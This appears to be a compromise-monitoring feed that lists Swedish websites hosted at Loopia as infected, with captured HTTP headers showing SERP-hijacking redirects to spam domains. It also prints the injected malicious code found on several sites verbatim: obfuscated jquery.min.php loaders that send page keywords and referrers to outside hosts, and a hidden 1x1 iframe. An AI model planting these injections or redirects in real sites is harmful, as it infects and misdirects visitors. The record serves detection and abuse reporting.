loopia.se<br>Found address(es): abuse@loopia.se1497625782http://manspodden.se/ (194.9.94.15) - Serp-hijackingAttacked url: http://manspodden.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 16 Jun 2017 07:06:12 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: manspodden.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Fri, 16 Jun 2017 05:06:12 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Link: &lt;http://manspodden.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: manspodden.se <br>Referer: http://www.google.com/search?q=manspodden.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Fri, 16 Jun 2017 05:06:10 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: redirectCookie=1; expires=Sat, 17-Jun-2017 05:06:10 GMT; Max-Age=86400 <br>Location: http://islas.co.uk/college/image/<br><br>manspodden.se is on 194.9.94.15<br>ASN for 194.9.94.15: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.15 corresponds with s515.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1497625625http://krafto.se/ (194.9.94.64) - Serp-hijackingAttacked url: http://krafto.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 12 Apr 2017 16:30:00 +0200<br><br>Visitors with referer are redirected to http://tdsinto.com/forexse?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: krafto.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.2 <br>Date: Wed, 12 Apr 2017 14:30:00 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://kraftovind.se/ <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: krafto.se <br>Referer: http://www.google.com/search?q=krafto.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.2 <br>Date: Wed, 12 Apr 2017 14:30:00 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://tdsinto.com/forexse?keyword=&amp;pill=<br><br>krafto.se is on 194.9.94.64<br>ASN for 194.9.94.64: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.64 corresponds with s506.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1492010409http://addfriends.se/ (194.9.95.173) - Serp-hijackingAttacked url: http://addfriends.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 12 Apr 2017 14:53:59 +0200<br><br>Visitors with referer are redirected to http://612.localtds.com/?WHdr3W&amp;keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: addfriends.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.2 <br>Date: Wed, 12 Apr 2017 12:53:59 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: PHPSESSID=ssepqg4edd135f8mv6lh08grc4; path=/ <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Link: &lt;http://addfriends.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://addfriends.se/&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: addfriends.se <br>Referer: http://www.google.com/search?q=addfriends.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.2 <br>Date: Wed, 12 Apr 2017 12:53:58 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: PHPSESSID=8a4hsfe0pmldrlllmmgsd1iga2; path=/ <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Location: http://612.localtds.com/?WHdr3W&amp;keyword=&amp;pill=<br><br>addfriends.se is on 194.9.95.173<br>ASN for 194.9.95.173: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.173 corresponds with s302.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1492010400http://kraftovind.se/ (194.9.94.64) - Serp-hijackingAttacked url: http://kraftovind.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 12 Apr 2017 11:27:08 +0200<br><br>Visitors with referer are redirected to http://tdsinto.com/forexse?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: kraftovind.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.2 <br>Date: Wed, 12 Apr 2017 09:27:08 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Link: &lt;http://kraftovind.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://kraftovind.se/&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: kraftovind.se <br>Referer: http://www.google.com/search?q=kraftovind.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.2 <br>Date: Wed, 12 Apr 2017 09:27:07 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://tdsinto.com/forexse?keyword=&amp;pill=<br><br>kraftovind.se is on 194.9.94.64<br>ASN for 194.9.94.64: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.64 corresponds with s506.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1492010323http://uusiteatteri.se/finndrama.html (194.9.94.136) - Serp-hijackingAttacked url: http://uusiteatteri.se/finndrama.html<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 12 Apr 2017 11:01:55 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: uusiteatteri.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.2 <br>Date: Wed, 12 Apr 2017 09:01:55 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: PHPSESSID=dfhoksghh6ao35qao4oobj9p06; path=/ <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Link: &lt;http://uusiteatteri.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: uusiteatteri.se <br>Referer: http://www.google.com/search?q=uusiteatteri.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.2 <br>Date: Wed, 12 Apr 2017 09:01:54 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>uusiteatteri.se is on 194.9.94.136<br>ASN for 194.9.94.136: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.136 corresponds with s530.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1492010282http://kattarina.nu/ (194.9.95.11) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; language=&quot;javascript&quot; src=&quot;http://www.activemeter.com/counter.js&quot;&gt;<br><br>Offensive url: http://www.activemeter.com/counter.js<br>Url is blacklisted in Google Safe Browsing<br><br>kattarina.nu is on 194.9.95.11<br>ASN for 194.9.95.11: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.11 corresponds with s48.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1491236131http://ledlampor.nu/ (194.9.94.155) - Serp-hijackingAttacked url: http://ledlampor.nu/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 27 Mar 2017 01:55:17 +0200<br><br>Visitors with referer are redirected to http://guysflinching.ru/extended?7 <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ledlampor.nu <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 403 Forbidden <br>Server: nginx/1.10.2 <br>Date: Sun, 26 Mar 2017 23:55:17 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ledlampor.nu <br>Referer: http://www.google.com/search?q=ledlampor.nu <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.10.2 <br>Date: Sun, 26 Mar 2017 23:55:17 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://guysflinching.ru/extended?7<br><br>ledlampor.nu is on 194.9.94.155<br>ASN for 194.9.94.155: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.155 corresponds with s362.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1490621996http://svensberg.se/ (194.9.94.235) - Serp-hijackingAttacked url: http://svensberg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 14 Mar 2017 22:28:12 +0100<br><br>Visitors with referer are redirected to http://kristasaidyes.com/zamf.html?h=1578074 <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: svensberg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.2 <br>Date: Tue, 14 Mar 2017 21:28:12 GMT <br>Content-Type: text/html <br>Content-Length: 382 <br>Connection: close <br>Vary: X-Forwarded-For <br>Last-Modified: Fri, 30 Aug 2013 13:23:24 GMT <br>ETag: &quot;524e095-17e-4e52a2088a2d8&quot; <br>Accept-Ranges: bytes <br>Cache-Control: max-age=1209600 <br>Expires: Tue, 28 Mar 2017 21:28:12 GMT <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: svensberg.se <br>Referer: http://www.google.com/search?q=svensberg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.2 <br>Date: Tue, 14 Mar 2017 21:28:12 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://kristasaidyes.com/zamf.html?h=1578074 <br>Cache-Control: max-age=1209600 <br>Expires: Tue, 28 Mar 2017 21:28:12 GMT<br><br>svensberg.se is on 194.9.94.235<br>ASN for 194.9.94.235: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.235 corresponds with s370.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1489586373http://ledlampor.nu/ (194.9.94.155) - Serp-hijackingAttacked url: http://ledlampor.nu/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 07 Dec 2016 16:45:58 +0100<br><br>Visitors with referer are redirected to http://guysflinching.ru/extended?7 <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ledlampor.nu <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 403 Forbidden <br>Server: nginx/1.10.1 <br>Date: Wed, 07 Dec 2016 15:45:53 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ledlampor.nu <br>Referer: http://www.google.com/search?q=ledlampor.nu <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.10.1 <br>Date: Wed, 07 Dec 2016 15:45:53 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://guysflinching.ru/extended?7<br><br>ledlampor.nu is on 194.9.94.155<br>ASN for 194.9.94.155: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.155 corresponds with s362.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1481181053http://ledlampor.nu/ (194.9.94.155) - Serp-hijackingAttacked url: http://ledlampor.nu/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 10 Nov 2016 15:56:35 +0100<br><br>Visitors with referer are redirected to http://guysflinching.ru/extended?7 <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ledlampor.nu <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 403 Forbidden <br>Server: nginx/1.10.1 <br>Date: Thu, 10 Nov 2016 14:56:35 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ledlampor.nu <br>Referer: http://www.google.com/search?q=ledlampor.nu <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.10.1 <br>Date: Thu, 10 Nov 2016 14:56:35 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://guysflinching.ru/extended?7<br><br>ledlampor.nu is on 194.9.94.155<br>ASN for 194.9.94.155: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.155 corresponds with s362.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1478853381http://svensberg.se/ (194.9.94.235) - Serp-hijackingAttacked url: http://svensberg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 09 Nov 2016 14:43:03 +0100<br><br>Visitors with referer are redirected to http://kristasaidyes.com/zamf.html?h=1578074 <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: svensberg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.1 <br>Date: Wed, 09 Nov 2016 13:43:03 GMT <br>Content-Type: text/html <br>Content-Length: 382 <br>Connection: close <br>Vary: X-Forwarded-For <br>Last-Modified: Fri, 30 Aug 2013 13:23:24 GMT <br>ETag: &quot;524e095-17e-4e52a2088a2d8&quot; <br>Accept-Ranges: bytes <br>Cache-Control: max-age=1209600 <br>Expires: Wed, 23 Nov 2016 13:43:03 GMT <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: svensberg.se <br>Referer: http://www.google.com/search?q=svensberg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.1 <br>Date: Wed, 09 Nov 2016 13:43:03 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://kristasaidyes.com/zamf.html?h=1578074 <br>Cache-Control: max-age=1209600 <br>Expires: Wed, 23 Nov 2016 13:43:03 GMT<br><br>svensberg.se is on 194.9.94.235<br>ASN for 194.9.94.235: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.235 corresponds with s370.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1478769420http://bolles.nu/ (194.9.94.17) - MalwareOffensive html code:<br>&lt;iframe src=&quot;http://javachek.tk/505x&quot; width=&quot;1&quot; height=&quot;1&quot; align=&quot;left&quot;&gt;<br><br>Offensive url: http://javachek.tk/505x<br>Url is blacklisted in Google Safe Browsing<br><br>bolles.nu is on 194.9.94.17<br>ASN for 194.9.94.17: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.17 corresponds with s540.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1472714990http://xn--skitikn-f1a.nu/ (194.9.94.60) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://strategictelemetry.net/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://strategictelemetry.net/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://strategictelemetry.net/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>xn--skitikn-f1a.nu is on 194.9.94.60<br>ASN for 194.9.94.60: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.60 corresponds with s516.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1471503731http://automationsguiden.se/ (194.9.94.86) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>automationsguiden.se is on 194.9.94.86<br>ASN for 194.9.94.86: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>rDNS not found for 194.9.94.86<br>Found address in whois: abuse@loopia.se1467892922http://snabbaekonomitips.se/ (194.9.95.229) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://sgtransmisiones.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://sgtransmisiones.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://sgtransmisiones.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>snabbaekonomitips.se is on 194.9.95.229<br>ASN for 194.9.95.229: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.229 corresponds with s476.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1467887605http://xn--skitikn-f1a.nu/ (194.9.94.60) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://strategictelemetry.net/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://strategictelemetry.net/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://strategictelemetry.net/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>xn--skitikn-f1a.nu is on 194.9.94.60<br>ASN for 194.9.94.60: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.60 corresponds with s516.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1467879231http://xn--gratisnjen-kcb.se/ (194.9.94.85) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://sgtransmisiones.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://sgtransmisiones.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://sgtransmisiones.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>xn--gratisnjen-kcb.se is on 194.9.94.85<br>ASN for 194.9.94.85: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>rDNS not found for 194.9.94.85<br>Found address in whois: abuse@loopia.se1467878377http://manganlundin.se/ (194.9.95.65) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://othis.be/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://othis.be/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://othis.be/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>manganlundin.se is on 194.9.95.65<br>ASN for 194.9.95.65: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.95.65 corresponds with s210.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1467787510http://automationsguiden.se/ (194.9.94.85) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>automationsguiden.se is on 194.9.94.85<br>ASN for 194.9.94.85: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>rDNS not found for 194.9.94.85<br>Found address in whois: abuse@loopia.se1467707912http://tgb-scooter.se/ (194.9.94.77) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://auxiliaryrecords.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://auxiliaryrecords.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://auxiliaryrecords.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>tgb-scooter.se is on 194.9.94.77<br>ASN for 194.9.94.77: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.77 corresponds with s447.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1467707529http://hittaminsidanu.se/ (194.9.94.86) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>hittaminsidanu.se is on 194.9.94.86<br>ASN for 194.9.94.86: 39570<br>Abusix contact information: (information only)<br>rDNS not found for 194.9.94.86<br>Found address in whois: abuse@loopia.se1467702695http://xn--kalvnset-4za.se/ (194.9.94.86) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>xn--kalvnset-4za.se is on 194.9.94.86<br>ASN for 194.9.94.86: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>rDNS not found for 194.9.94.86<br>Found address in whois: abuse@loopia.se1467701727http://miljolastbil.nu/ (194.9.94.85) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>miljolastbil.nu is on 194.9.94.85<br>ASN for 194.9.94.85: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>rDNS not found for 194.9.94.85<br>Found address in whois: abuse@loopia.se1467274952http://kraftservice.se/ (194.9.94.50) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://www.horizonvita.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://www.horizonvita.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://www.horizonvita.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>kraftservice.se is on 194.9.94.50<br>ASN for 194.9.94.50: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.50 corresponds with s432.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1467273180http://www.kraftservice.se/wp-content/themes/simple/js/html5.js (194.9.94.50) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://www.horizonvita.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://www.horizonvita.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return 